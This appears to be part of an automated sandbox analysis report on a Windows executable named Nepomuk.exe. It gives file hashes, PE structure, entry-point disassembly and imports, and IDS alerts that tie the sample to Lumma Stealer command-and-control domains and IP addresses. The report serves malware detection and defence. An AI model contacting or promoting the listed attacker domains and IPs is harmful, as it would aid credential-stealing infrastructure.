                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n4vr5s4d.osd.psm1

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ririhqs0.gx0.ps1

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u4frtelj.lnc.ps1

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_usfetwty.1uh.ps1

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                            C:\Users\user\AppData\Local\config

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):728
                                                                                                                                                                            Entropy (8bit):6.274107839635763
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:n2hFR/amPO2oNCLS82rcl/81/i60jCmC9WcojfWxzPnNyybBPMG/TknQtadLVUD9:nam2oNCLSb5idjCmqZQf2z1H9lrkQWK9
                                                                                                                                                                            MD5:49D52B0DEED2E78F905C037D6A49015F
                                                                                                                                                                            SHA1:9A14FDCFE4F7C32FC2A62FC3D5C07605DCAAB721
                                                                                                                                                                            SHA-256:6A142D3FEA667D25118FEEC859358603A153894EE2E1F8FC57E4B2384D25A680
                                                                                                                                                                            SHA-512:AC1F87F54EA5A9E5862CA1A51E69199E64484CB6BEEA499F749865F4FB72866377FECFD1F1C5CCE90B89469872B18E23F22950B66AEC18D833BC1CAB1CED0C58
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:...-.T.\...^../5.)..T+-VL.._F/S=Z.$+U=.^G..+V.X$M6_^[2..].. QW$?G=/^_.=.S>>.__)9T.* W&/ ]=..].10O..<..0^..(%..Y*..._..-3Y.!WF.RXA..VW;]._%.'@...[;#>G4T_\ >#P_/T_."5@.$0U...X.+.T.>^W*.5].9*]W.PO?7.......;..&8U.-.$.-/^Y%\.F?[.AW.&R;.S]3.]Y...M6!S]_S[[...M.]TXV.=W..(U.8)G".._.Z.VX..^.&.TW]>W[ U]2..].=?O%?..-.%.S0..!*(.R/Z...,Y].1F.WXAP9&R="1P4P.]W!.M+W>X./ZV/.,T,Y.G?$)_.^.T.*.[Q)V@.1_R.-1_...].*+Y.;+].%.Z..-PXZ'EV1....W.>.).+.?.....ZX.S...AT.0L%].Z.1.VP'.M.X.[Q6;Z(0.W%.!G+(;_6'1P)?.[..&@7.#U8.._.R.T/-4W^>!]..>]P,,O=.".7Q..0!...V...2*._>.Y .)F.R)A.#=R).%P> >Z.._M(W$["+#V...M..7[..-\...U...G/.._.9^['^.X...T2:.W>,.]7.%],.+O<$0.."..5.*.X...."..$[TY_\.F&[%A.*.Z-#+XV.]@.>3Q8:4X..*\T./M..0X.1\X>3?U[(2G.'W_.=.Z...SW.!Z21!W.?.Z"V.

                                                                                                                                                                            Static File Info

                                                                                                                                                                            General

                                                                                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                            Entropy (8bit):7.36890316864721
                                                                                                                                                                            TrID:
                                                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                            File name:Nepomuk.exe
                                                                                                                                                                            File size:573'440 bytes
                                                                                                                                                                            MD5:fac9214c35af0181c30099c68920f445
                                                                                                                                                                            SHA1:5fe0f210c6461db77ed5b7e265b85eae57ffa6f1
                                                                                                                                                                            SHA256:93c71027c0484c7be95f7285b2fe668b60b3bec52b0f57d0deb01fcdfe111a89
                                                                                                                                                                            SHA512:b24a667583c375bdfa7318b74aaa7b124bee84a528c30609eb0e7ca6b1c71426c980f52ea2488dba359e54be97e7144473849dc151dccb6434e60ad7409ec3a6
                                                                                                                                                                            SSDEEP:12288:gVL+IwnXn0S7X/fmB/TyXG3tXIODpvGtW55i5YO8:gVL+IQXjLWkW3dIO0WLi5b
                                                                                                                                                                            TLSH:5CC4F2E1315D820DE1E30678C7AD8B5422305E2B5AF26ACAFB4C7F07967EDC05911ABD
                                                                                                                                                                            File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...M..g.................(..........P.............@..................................j....@..........................T..U....Z..P..

                                                                                                                                                                            File Icon

                                                                                                                                                                            Icon Hash:59b9d9f3e8e8b64d

                                                                                                                                                                            Static PE Info

                                                                                                                                                                            General

                                                                                                                                                                            Entrypoint:0x401c50
                                                                                                                                                                            Entrypoint Section:.text
                                                                                                                                                                            Digitally signed:false
                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                            Time Stamp:0x67F7E04D [Thu Apr 10 15:14:21 2025 UTC]
                                                                                                                                                                            TLS Callbacks:
                                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                                            OS Version Major:6
                                                                                                                                                                            OS Version Minor:0
                                                                                                                                                                            File Version Major:6
                                                                                                                                                                            File Version Minor:0
                                                                                                                                                                            Subsystem Version Major:6
                                                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                                                            Import Hash:fd6361ba72b748c3b6b9430ee151fe92

                                                                                                                                                                            Entrypoint Preview

                                                                                                                                                                            Instruction
                                                                                                                                                                            push ebp
                                                                                                                                                                            push ebx
                                                                                                                                                                            push edi
                                                                                                                                                                            push esi
                                                                                                                                                                            sub esp, 18h
                                                                                                                                                                            movzx eax, word ptr [0045FB88h]
                                                                                                                                                                            test al, 3Fh
                                                                                                                                                                            je 00007F5A7486530Ch
                                                                                                                                                                            mov dword ptr [0045FB98h], D57AEF9Fh
                                                                                                                                                                            movsx ecx, word ptr [0045FB7Ah]
                                                                                                                                                                            test ecx, 0443CC0Fh
                                                                                                                                                                            jne 00007F5A7486530Eh
                                                                                                                                                                            mov dword ptr [0045FB64h], B7B3F3FBh
                                                                                                                                                                            jmp 00007F5A7486530Bh
                                                                                                                                                                            cmp dword ptr [0045FB64h], 00000000h
                                                                                                                                                                            je 00007F5A7486531Bh
                                                                                                                                                                            movsx edx, word ptr [0045FB92h]
                                                                                                                                                                            imul edx, edx, 9825125Dh
                                                                                                                                                                            or edx, 53A31489h
                                                                                                                                                                            mov dword ptr [0045FB6Ch], edx
                                                                                                                                                                            imul eax, eax, FFFFB1FBh
                                                                                                                                                                            test eax, 0000C2D2h
                                                                                                                                                                            jne 00007F5A7486531Bh
                                                                                                                                                                            cmp dword ptr [0045FB74h], 00000000h
                                                                                                                                                                            je 00007F5A74865312h
                                                                                                                                                                            mov eax, 000000EFh
                                                                                                                                                                            and eax, dword ptr [0045FB98h]
                                                                                                                                                                            mov dword ptr [0045FB60h], eax
                                                                                                                                                                            movsx edx, word ptr [0045FB9Ch]
                                                                                                                                                                            movzx eax, word ptr [0045FB78h]
                                                                                                                                                                            or edx, eax
                                                                                                                                                                            movzx edx, word ptr [0045FB70h]
                                                                                                                                                                            jne 00007F5A7486532Dh
                                                                                                                                                                            mov esi, 00007B85h
                                                                                                                                                                            sub esi, dword ptr [0045FB84h]
                                                                                                                                                                            imul ecx, dword ptr [0045FB94h]
                                                                                                                                                                            xor esi, edx
                                                                                                                                                                            xor ecx, esi
                                                                                                                                                                            add ecx, 2D4494A4h
                                                                                                                                                                            cmp ecx, 251DFCACh
                                                                                                                                                                            jnbe 00007F5A74865309h
                                                                                                                                                                            mov byte ptr [0045FB72h], 00000000h
                                                                                                                                                                            mov word ptr [0000FB88h], 0000h

                                                                                                                                                                            Data Directories

                                                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x54cc0x55.rdata
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x5af40x50.rdata
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x620000x2d989.rsrc
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x900000x964.reloc
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x61040x5c0.rdata
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                            Sections

                                                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                            .text0x10000x26370x2800f800c25edbcf65ca2906c99a7ac5ca13False0.5333984375data6.162339743766406IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                            .rdata0x40000x40b90x420059bc4a8c078384b38ef1dbae4720a9bbFalse0.3684303977272727data4.6701572898672IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                            .data0x90000x5739e0x56c000cbdb6bd1bdde6d3cf37e616dea02756False0.9996369551512968data7.999089175675054IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                            .CRT0x610000x40x200b0411168e5a96a22bafb6033cbd4808cFalse0.03125data0.06116285224115448IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                            .rsrc0x620000x2d9890x2da00f630103754a4b126aa76329d94a11a1fFalse0.23912136130136985data4.927765945521077IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                            .reloc0x900000x9640xa00279f02f310fc7835fff6f4fc87419631False0.81875data6.611532481787515IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                            Resources

                                                                                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                            RT_ICON0x625e40x427fPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9954767079833167
                                                                                                                                                                            RT_ICON0x668640x10828Device independent bitmap graphic, 128 x 256 x 32, image size 675840.10148763752513901
                                                                                                                                                                            RT_ICON0x7708c0x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 380160.1528799663653563
                                                                                                                                                                            RT_ICON0x805340x5488Device independent bitmap graphic, 72 x 144 x 32, image size 216000.18673752310536043
                                                                                                                                                                            RT_ICON0x859bc0x4228Device independent bitmap graphic, 64 x 128 x 32, image size 168960.18132971185640057
                                                                                                                                                                            RT_ICON0x89be40x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 96000.2586099585062241
                                                                                                                                                                            RT_ICON0x8c18c0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 42240.3219981238273921
                                                                                                                                                                            RT_ICON0x8d2340x988Device independent bitmap graphic, 24 x 48 x 32, image size 24000.45614754098360655
                                                                                                                                                                            RT_ICON0x8dbbc0x468Device independent bitmap graphic, 16 x 32 x 32, image size 10880.5292553191489362
                                                                                                                                                                            RT_MENU0x8e0240xdedata0.481981981981982
                                                                                                                                                                            RT_MENU0x8e1040x9cdata0.6923076923076923
                                                                                                                                                                            RT_MENU0x8e1a00xfcdata0.503968253968254
                                                                                                                                                                            RT_MENU0x8e29c0x226data0.3509090909090909
                                                                                                                                                                            RT_DIALOG0x8e4c40x14cdata0.5843373493975904
                                                                                                                                                                            RT_DIALOG0x8e6100x10cdata0.5895522388059702
                                                                                                                                                                            RT_DIALOG0x8e71c0xe8data0.6077586206896551
                                                                                                                                                                            RT_STRING0x8e8040x11eMatlab v4 mat-file (little endian) I, numeric, rows 0, columns 00.46853146853146854
                                                                                                                                                                            RT_STRING0x8e9240x254AmigaOS bitmap font "n", fc_YSize 17664, 18688 elements, 2nd "r", 3rd "r"0.2986577181208054
                                                                                                                                                                            RT_STRING0x8eb780x186data0.41794871794871796
                                                                                                                                                                            RT_ACCELERATOR0x8ed000x50data0.875
                                                                                                                                                                            RT_ACCELERATOR0x8ed500x58data0.8522727272727273
                                                                                                                                                                            RT_ACCELERATOR0x8eda80x48data0.9027777777777778
                                                                                                                                                                            RT_RCDATA0x8edf00x64aDelphi compiled form 'TfrmSlideShow'0.4322981366459627
                                                                                                                                                                            RT_GROUP_ICON0x8f43c0x84data0.7196969696969697
                                                                                                                                                                            RT_VERSION0x8f4c00x2bcdata0.5128571428571429
                                                                                                                                                                            RT_MANIFEST0x8f77c0x20dXML 1.0 document, ASCII textEnglishUnited States0.5352380952380953

                                                                                                                                                                            Imports

                                                                                                                                                                            DLLImport
                                                                                                                                                                            USER32.dllAdjustWindowRectEx, AdjustWindowRectExForDpi, AnimateWindow, AppendMenuW, BeginPaint, BringWindowToTop, CallNextHookEx, CallWindowProcW, CascadeWindows, CheckDlgButton, ChildWindowFromPoint, ClientToScreen, CloseClipboard, CloseGestureInfoHandle, CloseTouchInputHandle, CloseWindow, CreateCaret, CreateDialogParamW, CreateMenu, CreatePopupMenu, CreateWindowExW, DefWindowProcW, DestroyCaret, DestroyMenu, DestroyWindow, DialogBoxParamW, DispatchMessageW, DrawMenuBar, DrawTextW, EmptyClipboard, EndDialog, EndPaint, EnumDisplayMonitors, ExitWindowsEx, FillRect, FindWindowExW, FindWindowW, FlashWindow, FlashWindowEx, GetActiveWindow, GetAsyncKeyState, GetCapture, GetCaretPos, GetClassLongW, GetClientRect, GetClipboardData, GetCursor, GetDC, GetDesktopWindow, GetDlgItem, GetDlgItemTextW, GetDpiForWindow, GetFocus, GetForegroundWindow, GetGestureInfo, GetGuiResources, GetKeyState, GetKeyboardState, GetMenu, GetMessageW, GetMonitorInfoW, GetParent, GetSubMenu, GetSystemMetrics, GetTouchInputInfo, GetWindow, GetWindowDC, GetWindowLongW, GetWindowPlacement, GetWindowRect, GetWindowTextW, InsertMenuW, InvalidateRect, IsClipboardFormatAvailable, IsDlgButtonChecked, IsGUIThread, IsIconic, IsWindow, IsWindowVisible, IsZoomed, KillTimer, LoadAcceleratorsW, LoadCursorW, LoadIconW, LoadImageW, LoadMenuW, LoadStringW, LockWorkStation, MapVirtualKeyW, MessageBoxExW, MessageBoxIndirectW, MessageBoxW, MonitorFromWindow, OpenClipboard, OpenIcon, PeekMessageW, PostQuitMessage, RedrawWindow, RegisterClassExW, RegisterWindowMessageW, ReleaseCapture, ReleaseDC, RemoveMenu, ReplyMessage, ScreenToClient, SendMessageTimeoutW, SendNotifyMessageW, SetActiveWindow, SetCapture, SetCaretPos, SetClassLongW, SetClipboardData, SetCursor, SetDlgItemTextW, SetFocus, SetForegroundWindow, SetKeyboardState, SetMenu, SetParent, SetTimer, SetWindowLongW, SetWindowPlacement, SetWindowPos, SetWindowTextW, SetWindowsHookExW, ShowCursor, ShowWindow, ShowWindowAsync, SwitchToThisWindow, SystemParametersInfoW, TileWindows, TrackPopupMenu, TranslateMessage, UnhookWindowsHookEx, UnregisterClassW, UpdateWindow, ValidateRect, VkKeyScanW, WaitMessage, WinHelpW, WindowFromPoint, keybd_event, mouse_event, wsprintfW, wvsprintfW
                                                                                                                                                                            KERNEL32.dllAllocConsole, Beep, CancelIoEx, CloseHandle, CopyFileW, CreateDirectoryW, CreateEventW, CreateFileW, CreateMutexW, CreateProcessW, CreateSemaphoreW, CreateSymbolicLinkW, CreateThread, DebugBreak, DeleteCriticalSection, DeleteFileW, DeviceIoControl, EnterCriticalSection, ExitProcess, ExitThread, FindClose, FindFirstFileW, FindNextFileW, FlushFileBuffers, FormatMessageW, FreeConsole, FreeLibrary, GetCommandLineW, GetComputerNameW, GetConsoleMode, GetCurrentDirectoryW, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetDiskFreeSpaceW, GetDriveTypeW, GetEnvironmentVariableW, GetErrorMode, GetExitCodeProcess, GetFileAttributesW, GetFileInformationByHandle, GetFileSize, GetFileType, GetFullPathNameW, GetLastError, GetLogicalDriveStringsW, GetLongPathNameW, GetModuleFileNameW, GetModuleHandleExW, GetModuleHandleW, GetNativeSystemInfo, GetProcAddress, GetProcessAffinityMask, GetProcessDEPPolicy, GetProcessHeap, GetProcessId, GetProcessTimes, GetShortPathNameW, GetStartupInfoW, GetStdHandle, GetSystemDirectoryW, GetSystemInfo, GetSystemPowerStatus, GetSystemTime, GetSystemTimeAsFileTime, GetTempPathW, GetThreadContext, GetThreadId, GetThreadPriority, GetTickCount, GetTimeZoneInformation, GetUserDefaultLocaleName, GetVersion, GetVersionExW, GlobalMemoryStatusEx, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, HeapValidate, InitializeCriticalSection, IsDebuggerPresent, LeaveCriticalSection, LoadLibraryW, LockFile, MoveFileW, OpenEventW, OutputDebugStringW, QueryDosDeviceW, QueryPerformanceCounter, ReadConsoleW, ReadFile, ReadFileEx, ReleaseMutex, RemoveDirectoryW, ResumeThread, SetConsoleMode, SetCurrentDirectoryW, SetEndOfFile, SetErrorMode, SetFileAttributesW, SetFilePointer, SetLastError, SetProcessAffinityMask, SetProcessDEPPolicy, SetStdHandle, SetThreadContext, SetThreadExecutionState, SetThreadPriority, SignalObjectAndWait, Sleep, SleepEx, SuspendThread, SwitchToThread, TerminateProcess, TerminateThread, TryEnterCriticalSection, UnlockFile, VirtualAlloc, VirtualFree, VirtualProtect, VirtualQuery, WTSGetActiveConsoleSessionId, WaitForMultipleObjects, WaitForSingleObject, Wow64DisableWow64FsRedirection, Wow64RevertWow64FsRedirection, WriteConsoleW, WriteFile, WriteFileEx, lstrcatW, lstrcmpiW, lstrcpyW, lstrlenW
                                                                                                                                                                            ADVAPI32.dllAccessCheck, AccessCheckByType, AccessCheckByTypeResultList, AddAccessAllowedAce, AddAccessDeniedAce, AdjustTokenPrivileges, AllocateAndInitializeSid, AllocateLocallyUniqueId, ChangeServiceConfigW, CheckTokenMembership, ControlService, CopySid, CryptAcquireContextW, CryptCreateHash, CryptDecrypt, CryptDeriveKey, CryptDestroyKey, CryptEncrypt, CryptExportKey, CryptGenKey, CryptHashData, CryptImportKey, CryptReleaseContext, CryptSignHashW, CryptVerifySignatureW, DecryptFileW, DeleteService, DeregisterEventSource, EncryptFileW, EnumDependentServicesW, EnumServicesStatusW, FileEncryptionStatusW, FreeSid, GetAce, GetAclInformation, GetLengthSid, GetSecurityDescriptorDacl, GetSidIdentifierAuthority, GetSidSubAuthority, GetSidSubAuthorityCount, GetTokenInformation, GetUserNameW, InitializeAcl, InitializeSecurityDescriptor, IsTextUnicode, IsValidAcl, LogonUserW, LookupAccountNameW, LookupAccountSidW, LookupPrivilegeValueW, MapGenericMask, NotifyServiceStatusChangeW, ObjectCloseAuditAlarmW, ObjectOpenAuditAlarmW, ObjectPrivilegeAuditAlarmW, OpenProcessToken, OpenSCManagerW, OpenServiceW, OpenThreadToken, PrivilegeCheck, PrivilegedServiceAuditAlarmW, QueryServiceConfigW, QueryServiceStatus, RegCloseKey, RegConnectRegistryW, RegCreateKeyExW, RegDeleteKeyW, RegDeleteValueW, RegEnumKeyExW, RegEnumValueW, RegLoadAppKeyW, RegLoadKeyW, RegNotifyChangeKeyValue, RegOpenKeyExW, RegQueryValueExW, RegRestoreKeyW, RegSaveKeyExW, RegSaveKeyW, RegSetValueExW, RegUnLoadKeyW, RegisterEventSourceW, ReportEventW, SetAclInformation, SetSecurityDescriptorDacl, SetTokenInformation, StartServiceW

                                                                                                                                                                            Exports

                                                                                                                                                                            NameOrdinalAddress
                                                                                                                                                                            ?DecoyAPICalls@@YAXXZ10x401000

                                                                                                                                                                            Version Infos

                                                                                                                                                                            DescriptionData
                                                                                                                                                                            CompanyNameCost-effective System Ltd.
                                                                                                                                                                            FileDescriptionTool to Evaluate Application efficiently
                                                                                                                                                                            FileVersion2.15.193.5035
                                                                                                                                                                            ProductNameCreateInfo
                                                                                                                                                                            LegalCopyright 2025 Cost-effective System Ltd.
                                                                                                                                                                            InternalNameNepomuk
                                                                                                                                                                            Translation0x0409 0x04e4

                                                                                                                                                                            Possible Origin

                                                                                                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                            EnglishUnited States

                                                                                                                                                                            Network Behavior

                                                                                                                                                                            Suricata IDS Alerts

                                                                                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                            2025-04-12T09:26:24.734313+02002061393ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (soursopsf .run)1192.168.2.4579341.1.1.153UDP
                                                                                                                                                                            2025-04-12T09:26:24.859642+02002061395ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (changeaie .top)1192.168.2.4496661.1.1.153UDP
                                                                                                                                                                            2025-04-12T09:26:25.294844+02002061396ET MALWARE Observed Win32/Lumma Stealer Related Domain (changeaie .top in TLS SNI)1192.168.2.449716104.21.42.7443TCP
                                                                                                                                                                            2025-04-12T09:26:25.294844+02002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449716104.21.42.7443TCP
                                                                                                                                                                            2025-04-12T09:26:27.084877+02002061396ET MALWARE Observed Win32/Lumma Stealer Related Domain (changeaie .top in TLS SNI)1192.168.2.449717104.21.42.7443TCP
                                                                                                                                                                            2025-04-12T09:26:27.084877+02002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449717104.21.42.7443TCP
                                                                                                                                                                            2025-04-12T09:26:28.341631+02002061396ET MALWARE Observed Win32/Lumma Stealer Related Domain (changeaie .top in TLS SNI)1192.168.2.449718104.21.42.7443TCP
                                                                                                                                                                            2025-04-12T09:26:28.341631+02002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449718104.21.42.7443TCP
                                                                                                                                                                            2025-04-12T09:26:29.570168+02002061396ET MALWARE Observed Win32/Lumma Stealer Related Domain (changeaie .top in TLS SNI)1192.168.2.449719104.21.42.7443TCP
                                                                                                                                                                            2025-04-12T09:26:29.570168+02002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449719104.21.42.7443TCP
                                                                                                                                                                            2025-04-12T09:26:31.652698+02002061396ET MALWARE Observed Win32/Lumma Stealer Related Domain (changeaie .top in TLS SNI)1192.168.2.449720104.21.42.7443TCP
                                                                                                                                                                            2025-04-12T09:26:31.652698+02002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449720104.21.42.7443TCP
                                                                                                                                                                            2025-04-12T09:26:33.229489+02002061396ET MALWARE Observed Win32/Lumma Stealer Related Domain (changeaie .top in TLS SNI)1192.168.2.449721104.21.42.7443TCP
                                                                                                                                                                            2025-04-12T09:26:33.229489+02002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449721104.21.42.7443TCP
                                                                                                                                                                            2025-04-12T09:26:36.799930+02002061396ET MALWARE Observed Win32/Lumma Stealer Related Domain (changeaie .top in TLS SNI)1192.168.2.449727104.21.42.7443TCP
                                                                                                                                                                            2025-04-12T09:26:36.799930+02002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449727104.21.42.7443TCP
                                                                                                                                                                            2025-04-12T09:26:37.754261+02002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449728140.82.114.3443TCP
                                                                                                                                                                            2025-04-12T09:26:38.633161+02002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449729185.199.111.133443TCP
                                                                                                                                                                            2025-04-12T09:26:39.185271+02002822537ETPRO EXPLOIT Possible Win32k Elevation of Privilege Vulnerability (CVE-2016-7191)1185.199.111.133443192.168.2.449729TCP

                                                                                                                                                                            Network Port Distribution

                                                                                                                                                                            TCP Packets

                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                            Apr 12, 2025 09:26:25.056782961 CEST49716443192.168.2.4104.21.42.7
                                                                                                                                                                            Apr 12, 2025 09:26:25.056833982 CEST44349716104.21.42.7192.168.2.4
